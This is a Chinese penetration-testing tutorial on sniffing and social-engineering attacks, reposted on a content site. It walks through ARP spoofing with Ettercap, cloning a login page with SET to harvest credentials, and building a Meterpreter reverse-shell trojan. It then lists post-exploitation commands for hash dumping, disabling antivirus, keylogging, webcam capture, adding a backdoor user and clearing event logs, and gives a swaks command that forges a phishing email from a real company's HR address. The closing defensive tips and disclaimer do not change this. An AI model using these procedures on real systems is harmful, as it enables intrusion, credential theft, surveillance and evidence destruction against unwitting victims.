渗透测试--3.1嗅探欺骗攻击

news2024/12/28 20:17:11

目录

1.中间人攻击

2. 社会工程学攻击

SET使用实例——建立克隆钓鱼网站收集目标凭证 

SET工具集之木马欺骗实战反弹链接

后渗透阶段

钓鱼邮件

总结


1.中间人攻击

        中间人攻击(Man-in-the-middle attack,简称MITM)是一种常见的网络攻击方式,它通过拦截双方通信并篡改其内容,来达到窃取数据、伪造数据等恶意行为。

        中间人攻击的原理是攻击者在通信的两个节点之间插入自己,使得双方认为自己在与对方通信,但实际上所有的通信都经过了攻击者。攻击者可以在通信的过程中窃取、篡改或伪造信息。


arp欺骗

        攻击者发送虚假的ARP广播,使得目标主机发送的数据包被重定向到攻击者控制的设备,从而达到拦截和修改数据包的目的。


DNS欺骗

        攻击者在本地或远程的DNS服务器上伪造DNS记录,使得用户在访问某个网站时被重定向到攻击者控制的网站上,以此实现窃取用户账号、密码等信息的目的。

无线局域网漏洞利用

        攻击者通过欺骗、重放攻击等手段窃取无线网络流量,获取用户名、密码等信息。

防御中间人攻击的方法包括使用HTTPS加密通信、验证证书、避免使用公共Wi-Fi等。

对于企业和组织来说,还需要建立安全策略和监控机制,及时发现并阻止中间人攻击行为。


使用 Ettercap 执行欺骗攻击

        地址解析协议(ARP)欺骗可能是最常见的 MITM 攻击。它基于一个事实,就是 ARP 并不验证系统所收到的响应。这就意味着,当 Alice 的电脑询问网络上的所有设备,“IP 为xxx.xxx.xxx.xxx 的机器的 MAC 地址是什么”时,它会信任从任何设备得到的答复。该设备可能是预期的服务器,也可能是不是。

        ARP 欺骗或毒化的工作方式是,发送大量 ARP 响应给通信的两端,告诉每一端攻击者的 MAC 地址对应它们另一端的 IP 地址。


1、首先查看欺骗之前靶机ip以及默认网关,

ipconfig
arp -a

Ip:192.168.76.138    默认网关:192.168.76.2 

2、查看kali的IP地址(192.168.76.134),MAC:000c29407990

3、使用Ettercap,将A主机和B主机加入到target中

 4、点击右上角,选择ARP poisoning;选择sniff remote connections

 5、靶机进入到测试网址http://www.testfire.net/login.jsp,输入测试账号密码

6、Kali上可以截取到相关的输入信息

7、进行ARP欺骗后的目标机网关状态变成了kali:


2. 社会工程学攻击

         社会工程攻击,是一种利用“社会工程学” (Social Engineering)来实施的网络攻击行为。

        Kali Linux系统集成了一款社会工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社会工程学渗透测试工具。这套工具包由David Kenned设计,而且已经成为业界部署实施社会工程学攻击的标准。

       SET最常用的攻击方法有:用恶意附件对目标进行 E-mail 钓鱼攻击、Java Applet攻击、基于浏览器的漏洞攻击、收集网站认证信息、建立感染的便携媒体、邮件群发等攻击手段。


 1.kali启动SET

 或者在终端输入setoolkit命令

1) Social-Engineering Attacks:社会工程学攻击
2) Penetration Testing (Fast- Track):快速追踪渗透测试
3) Third Party Modules:第三方模块
4) Update the Social-Engineer Toolkit:更新SET
5) Update SET configuration:升级SET的配置(每次设置完set.config需要)
6) Help, Credits, and About: SET使用帮助及 相关信息
99) Exit the Social-Engineer Toolkit:退出SET


2.选择菜单第1项:Social-Engineering Attacks:社会工程学攻击 

Spear-Phishing Attack Vectors --鱼叉式网络钓鱼攻击载体
Website Attack Vectors --网站攻击向量
Infectious Media Generator --传染源
Create a Payload and Listener --创建负载和侦听器
Mass Mailer Attack --群发邮件攻击
Arduino-Based Attack Vector --基于 Arduino 的攻击向量
Wireless Access Point Attack Vector --无线接入点攻击向量
QRCode Generator Attack Vector --qrcode 生成器攻击向量
Powershell Attack Vectors --powershell 攻击向量
SMS Spoofing Attack Vector --短信欺骗攻击向量
Third Party Modules --第三方模块
Return back to the main menu. --返回主菜单


SET使用实例——建立克隆钓鱼网站收集目标凭证 

步骤1:选择菜单第1项:Social-Engineering Attacks:社会工程学攻击

步骤2:继续选择菜单第2项:Website Attack Vectors(网站攻击向量)

步骤3:继续选择菜单第5项:Web Jacking 攻击方法

Java Applet Attack Method – Java Applet 攻击方法

Metasploit Browser Exploit Method – Metasploit 浏览器利用方法
Credential Harvester Attack Method --凭证收割机攻击方法
Tabnabbing Attack Method --制表攻击方法
Web Jacking Attack Method --Web Jacking 攻击方法
Multi-Attack Web Method --多攻击 web 方法
Full Screen Attack Method --全屏攻击法

HTA Attack Method – HTA 攻击方法

步骤4:继续选择菜单第2项:Site Cloner --页面克隆

  1. Web Templates --web 模板
  2. Site Cloner --页面克隆
  3. Custom Import --自定义导入
  4. Return to Webattack Menu

 

步骤5:要求您提供一个 IP 地址(Kali Linux 计算机的 IP 地址,攻击机的 IP) 

步骤6:输入克隆的网址:http://www.testfire.net/login.jsp 

打开网址:192.168.76.134 ,将克隆的网址发送给受害者即可

The site http://www.testfire.net/login.jspĀ  has moved, click here to go to the new location.

步骤7:模拟受害机登录网站,输入用户名和密码并尝试登录,观察到攻击机SET界面成功监听到受害机的用户名和密码信息。


set工具集之木马欺骗实战反弹链接

1、运行 SET,选择4.创建攻击载荷和监听器:

2、选择攻击模式2.Windows Reverse_TCP Meterpreter,然后设置监听的主机IP(kali攻击机的IP地址)和端口,即可在本地生成木马程序: 

mv /root/.set/payload.exe /home/gyp-202031070222/桌面

3、将木马程序发送给 目标靶机,Kali攻击机开启监听后,Win 7虚拟机双击运行木马程序:

4、此时 Kali 攻击机启动了MSF框架并成功获得攻击会话:

5、激活 Meterpreter 会话,获得 Shell 后即可操控 Win 7 靶机,如下图所示:

sessions -i 1
//这个命令是针对 Metasploit Framework 的,sessions -i 1 的作用是切换到会话 ID 为 1 的会话。在 //Metasploit 中,当攻击成功后会生成一个新的会话,可以通过 sessions 命令来管理这些会话。使用 //sessions -l 命令可以列出当前所有的会话,会话 ID 可以从该命令输出中获取。然后通过 sessions -i //[SESSION ID] 命令来切换到对应的会话,开始进行后续操作。

 


后渗透阶段

运行了通过木马程序之后,我们开启了一个reverse TCP监听器来监听本地的 80 端口,即攻击者的本地主机地址(LHOST)和端口号(LPORT)。

在meterpreter > 中我们可以使用以下的命令来实现对目标的操作:
sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
hashdump        #导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件   #执行可执行程序
run getgui -u hack -p 123    #创建hack用户,密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run                             #使用扩展库
clearev                       #清除事件日志


示例:

1.查看主机系统信息

2.到处用户密码的hash值

3.获得shell控制台


下面的模块主要用于在取得目标主机系统远程控制权后,进行一系列的后渗透攻击动作。

run post/windows/manage/migrate                  #自动进程迁移     
run post/windows/gather/checkvm                  #查看目标主机是否运行在虚拟机上     
run post/windows/manage/killav                   #关闭杀毒软件     
run post/windows/manage/enable_rdp               #开启远程桌面服务     
manrun post/windows/age/autoroute                #查看路由信息     
run post/windows/gather/enum_logged_on_users     #列举当前登录的用户     
run post/windows/gather/enum_applications        #列举应用程序     
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码     
run windows/gather/smart_hashdump                #dump出所有用户的hash


日志清除

1、为了不暴露攻击者的痕迹行为,需要清除系统事件,先打开 Windows 事件查看器:

2、在 Meterpreter 执行命令 clearev 命令,对靶机的日志进行清除,如下图所示:

3、此时重新查看 Win7 的事件查看器,系统日志信息已经被清空:


钓鱼邮件

当攻击者制作了钓鱼网站、木马程序后,便会想法设法将其传给受害者,而常见的传播方式便是钓鱼网站了。安全意识较差的用户在收到钓鱼邮件后点击邮件中的钓鱼链接、下载附件中的木马程序,便可能遭受攻击!

工具简述

Swaks 是一款类似于“瑞士军刀”的工具,之所以这么说是因为它在SMTP邮件协议领域有非常非常广泛的应用,同时对于一名信息安全高级工程师来说也是一个不错的利用工具!它通常被用来伪造邮件,进行钓鱼、社工等操作。

Swaks基本用法

1、swaks --to test@qq.com 测试邮箱的连通性;

2、参数说明(这里只是简单的罗列了一些,至于更加具体的内容可以使用–help进行查看了解):

--from  test@qq.com     //发件人邮箱;
--ehlo   qq.com      //伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证
--body  "http://www.baidu.com"    //引号中的内容即为邮件正文;
--header  "Subject:hello"   //邮件头信息,subject为邮件标题
--data   ./Desktop/email.txt    //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送;

3、Kali 内置了swaks,如下图所示:

4、zai网站生成一个零时邮箱用来测试https://temp-mail.org/zh/view/646211846ea2510c5c1d87b5

5、伪造一份来自 360hr 的邮件,收件人为segefeh529@jwsuns.com,内容为:“Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test.php”,如下图所示:

swaks --to segefeh529@jwsuns.com --from hr@360.cn --ehlo 360.cn --body "Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test.php"

6、点击查看邮件详情:

但是,QQ邮箱和网易云邮箱暂不可送达,应该是腾讯、网易设定的安全机制的原因!在此提醒遇到可疑邮件要查看源邮件,判断发信人IP是否为可信任的IP,不然一个贸然的操作有时候将可能导致自己被钓鱼甚至攻击!


总结


废话不多说,给出几条防范社工攻击的建议:

  1. 当心来路不明的服务供应商等人的电子邮件、即时简讯以及电话。在提供任何个人信息之前验证其可靠性和权威性;
  2. 永远不要点击来自未知发送者的电子邮件中的嵌入链接,如果有必要就使用搜索引擎寻找目标网站或手动输入网站URL;
  3. 永远不要在未知发送者的电子邮件中下载附件,如果有必要可以在保护视图中打开附件,这个在许多操作系统中是默认启用的;
  4. 使用强大的防火墙来保护你的电脑空间,及时更新杀毒软件同时提高垃圾邮件过滤器的门槛;
  5. 下载软件及操作系统补丁,预防零日漏洞,及时跟随软件供应商发布的补丁同时尽可能快地安装补丁版本;
  6. 关注网站的URL,有时网上的骗子对URL做了细微的改动,将流量诱导进了自己的诈骗网站;
  7. 不要随意扫描二维码!你所扫描后到的网站可能是一个钓鱼网站;
  8. 不要轻易连接公告WIFI,进入攻击者设定的局域网环境,你的很多上网隐私将处于裸奔状态,同时容易遭受 ARP欺骗、DNS劫持、网络钓鱼等攻击!

最后,本文仅限于技术讨论与分享,严禁用于非法途径……

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/530542.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

一文带你完整了解数据的编码!!

数据编码是将数据转换为计算机可读取和处理的二进制格式的过程。在数据存储中,正确的数据编码非常重要,因为它能够保证数据的完整性、可靠性和可读性。 数据编码可以确保数据在存储过程中不会发生错误。通过使用适当的数据编码规则,可以防止…

三十二、自定义镜像

1 、Docker镜像的原理 Docker镜像本质是什么? Docker中一个centos镜像为什么只有200MB,而一个centos操作系统的iso文件要几个G? Docker中一个tomcat镜像为什么有500MB,而一个tomcat安装包只有10多MB? 操作系统组成部分: 计算机组成原理 进程调度子…

OPPO 关停“造芯”业务 ZEKU:一场大胆的尝试的结束

前言 近期,OPPO 关停了其“造芯”业务 ZEKU,结束了其自主研发处理器的尝试。本文将对这一事件进行探讨,分析其背后的原因及其对整个行业的影响。 1. ZEKU的成立与使命 在2019年,OPPO旗下的ZEKU研究所成立,标志着OPP…

Redis缓存穿透、缓存雪崩和缓存击穿

缓存穿透 缓存穿透,是指查询一个缓存和数据库中都没有的数据。正常的使用缓存流程大致是,数据查询先进行缓存查询,如果key不存在或者key已经过期,再对数据库进行查询,并把查询到的对象,放进缓存。如果数据库…

Centos和Windows之间通过主机名实现相互访问

一、业务需求 在内网环境中,我们想直接通过特定的主机名称去访问我们的服务器,而不用去记忆服务器的IP地址,且不想通过nginx等代理工具或域名配置内容来操作。 二、分析 通常我们可以直接在浏览器中输入【localhost】后按下回车键后就可以访问我们的主机80端口的内容了;那…

计算机网络大作业(Wireshark抓包分析)

实验要求 wireshark的深入学习与掌握,如过滤器的使用,归纳方法通过实验阐述ARP的工作原理利用实验结果分析 ICMP 协议的报文结构字段定义基于实验数据深入分析 TCP 协议的连接过程原理,报文的分片等功能从校园网发起向外网中某 Web 服务器的…

基于正点原子电机实验的pid调试助手代码解析(速度环控制)

这里写目录标题 下位机与PID调试助手传输的原理代码讲解(基于正点原子)解析数据接受和数据发送的底层函数数据接受数据帧格式环形数组以及怎么找到它的帧头位置crc校验 数据发送数据上传函数 通过前两节文章,我已经了解了基本的pid算法,现在在完成了电机…

MatrixGate 5.0 性能再升级,加载速度提升三倍!

前言 数据的加载速度在数据处理和分析领域一直是一个挑战,为应对这一挑战,YMatrix 数据库开发了 mxgate 高速数据加载工具。最近,随着 YMatrix 5.0 的 GA,新版 mxgate 与上一版本(4.8.1)相比,速…

Linux 虚拟机 磁盘扩容

概述 在单台虚拟机上部署了过多服务,导致磁盘使用过度达到98%。 现在扩容提高磁盘容量,增加10G。 现象 df -h df -ih du -s具体步骤 VMware 扩容 关闭虚拟机的情况下执行,类似于生产环境下需要关闭服务器,从而添加硬盘等相关操作…

Liunx基础命令 - rm删除命令

rm命令 – 删除文件或目录 rm命令来自英文单词“remove”的缩写,中文译为“消除”,其功能是用于删除文件或目录,一次可以删除多个文件,或递归删除目录及其内的所有子文件。 rm也是一个很危险的命令,使用的时候要特别…

从BinDiff到0day 在IE中利用CVE-2019-1208

前言 如上所述,CVE-2019-1208是UAF漏洞,这类安全漏洞可以破坏有效数据、引发进程crash、并且可以精心利用最终导致任意代码执行。而对于本文介绍的CVE-2019-1208而言,成功利用此漏洞的攻击者可以获得系统当前用户权限。如果当前用户具有admi…

理解Java虚拟机——JVM

目录 一、初识JVM 二、JVM执行流程 三、内存区域划分(JVM运行时数据区) 3.1 本地方法栈(线程私有) 3.2 程序计数器(线程私有,无并发问题) 3.3 JVM虚拟机栈(线程私有&#xff0…

最全的分布式事务详情,它来啰~

我们首先得理解什么是分布式事务呢?分布式事务是指在分布式系统中,涉及多个计算机或服务器的操作序列,这些操作需要满足一致性和可靠性的要求。每个操作要么全部成功执行,要么全部回滚,以保持数据的一致性和完整性。 …

嵌入式通信协议【Modbus】Modbus TCP的帧格式

一、请求帧格式 Client request:例: 19 B2 00 00 00 06 06 03 00 27 00 02 1、头字节 上面是modbus客户端发出的报文内容,为modbus tcp/ip协议格式,其前面的六个字节为头字节( header handle); 19 B2 00 00 00 06 19 B2 00 00…

3D点云之语义分割(相关官方示例介绍)

之前在博客中提到,会考虑用深度学习来对3D点云进行处理,接下来迈出脚步,先整几个例子来熟悉它。例子原型来源于官网,博主在其基础上做了一些代码修改。 一. 例子参考 1. Keras中的资源 Code examples 2.openvinotoolkit open_…

20230515在亚马逊Amazon扣费之后的申诉

20230515在亚马逊Amazon扣费之后的申诉 2023/5/15 22:56 缘起:使用Amazon的12个月的免费存储桶,然后调用S3功能翻译! 但是,被扣费了! 由于绑定的信用卡是工行的,要求和亚马逊解除绑定,工行给了一…

第十章创建模式—外观模式

文章目录 外观模式解决的问题概念结构 案例优缺点使用场景Tomcat 源码 结构型模式描述如何将类或对象按某种布局组成更大的结构,有以下两种: 类结构型模式:采用继承机制来组织接口和类。对象结构型模式:釆用组合或聚合来组合对象。…

GEE:无监督聚类算法(wekaKMeans)

作者:CSDN @ _养乐多_ 本文将介绍如何使用 Google Earth Engine(GEE)进行卫星图像 K-means 聚类分析的基本步骤,并提供相应的示例代码。 结果如下图所示, 文章目录 一、K-means 原理二、代码详解三、代码链接一、K-means 原理 二、代码详解 var roi = table; Map.cent…

【前后端异常】axios post请求 返回415错误状态码的解决方法

错误描述: 进行有文件的表单提交时出现415错误,以前没遇到过记录一下 415错误的解释是说,服务器无法处理请求附带的媒体格式。以下是HTTP的状态码关于415返回码的说明: 415Unsupported Media Type服务器无法处理请求附带的媒体格…

awk的应用

awk的基本应用 一、awk的工作原理二、实际应用按行输出文本按字段输出文本时间的使用查看各个功能 一、awk的工作原理 awk与sed和grep共成为文本三剑客,都是针对文本非常实用的工具。 awk的工作原理: 遂行读取文本,默认以空格或者tab&#x…